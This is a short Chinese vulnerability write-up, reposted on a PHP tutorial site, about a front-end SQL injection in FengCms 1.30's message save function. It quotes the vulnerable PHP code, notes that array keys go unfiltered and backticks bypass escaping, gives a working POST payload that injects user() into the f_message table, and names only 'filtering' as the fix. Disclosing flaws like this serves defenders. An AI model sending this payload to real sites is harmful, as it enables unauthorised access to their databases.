网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

FengCms1.30注入(前台) - 网站安全 - 自学php网

来源:未知    时间:2015-04-15 13:09 作者:xxadmin 阅读:

[导读] http://www.fengcms.com/ app\model\messageModel.php public function save($array){if($_SESSION[authnum]!=$array[ vc ode]||$_SESSION[authnum]==){ return array(status = c);exit;}unset($array[vcode]);$re=D($this-d_name)-insert($array);if($re){$_...

http://www.fengcms.com/

app\model\messageModel.php

public function save($array){
if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){ return array('status' => 'c');exit;}
unset($array['vcode']);
$re=D($this->d_name)->insert($array);

if($re){
$_SESSION['authnum']="";
return array('status' => 'y','id' => $re);

}else{

return array('status' => 'n','id' => $re);
}

$re=D($this->d_name)->insert($array);

未对数组key过滤。

反引号无视转义。

pyload:

POST /?controller=message&operate=save

title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319

 

fengcms#1.png




 

fengcms#2.png




 

fengcms3.png

 

解决方案:

过滤~

 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论